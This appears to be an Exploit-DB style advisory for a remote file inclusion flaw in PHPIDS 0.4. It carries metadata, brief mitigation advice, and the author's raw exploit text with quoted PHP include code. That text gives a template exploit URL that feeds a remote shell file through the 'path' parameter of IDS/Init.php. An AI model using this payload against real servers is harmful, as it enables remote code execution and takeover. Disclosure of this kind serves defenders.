PHPIDS 0.4 - Remote File Inclusion Vulnerability

vendor:

PHPIDS

by:

eidelweiss

7,5

CVSS

HIGH

Remote File Inclusion Vulnerability

CWE

Product Name: PHPIDS

Affected Version From: 0.4

Affected Version To: 0.4

Patch Exists: NO

Related CWE: N/A

CPE: a:phpids:phpids:0.4

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

PHPIDS 0.4 – Remote File Inclusion Vulnerability

The vulnerability exists in the 'require_once' statement of the 'IDS/Init.php' file, which allows an attacker to include a remote file by manipulating the 'path' parameter in the URL.

Mitigation:

The application should validate the input and filter out any malicious input. The application should also use a whitelist of accepted values for the input.

Source

Exploit-DB raw data:

###########################################################
###									#
### 		PHPIDS 0.4 - Remote File Inclusion Vulnerability			#
###									#
###########################################################
###	
###	* @package	  PHPIDS
###	* @Version 	  0.4
###	* @license	  http://www.gnu.org/licenses/lgpl.html LGP
###	* @link		  http://php-ids.org/	
###
###########################################################
###
###	Type :	Remote File Inclusion Vulnerability
###	Author:	eidelweiss
###	Date  :	2010-02-08
###	Location:	Indonesia ( http://yogyacarderlink.web.id )
###	Contact:	g1xsystem [at] windowslive [dot] com
###
###########################################################
###
###	Vuln:	require_once 'IDS/Init.php'
###
###		if (version_compare(phpversion(), '5.1.6', '>=')) {
###			set_include_path (
###				get_include_path()
###				. PATH_SEPARATOR
###				. BX_DIRECTORY_PATH_PLUGINS . 'phpids/'
###
###		include_once 'IDS/Monitor.php';
###		include_once 'IDS/Filter/Storage.php';
###		if ($configPath) {
###			$this->setConfigPath($configPath);
###			$this->config = parse_ini_file($this->configPath, true);
###	=========================================================
###	Exploit: http://victim.com/[PHPIDS_path]/IDS/Init.php?path=[Shell.txt?]
###########################################################
###									#
###	Greetz : AL-MARHUM - YOGYACARDERLINK TEAM - (D)eal(C)yber		#
###									#
###########################################################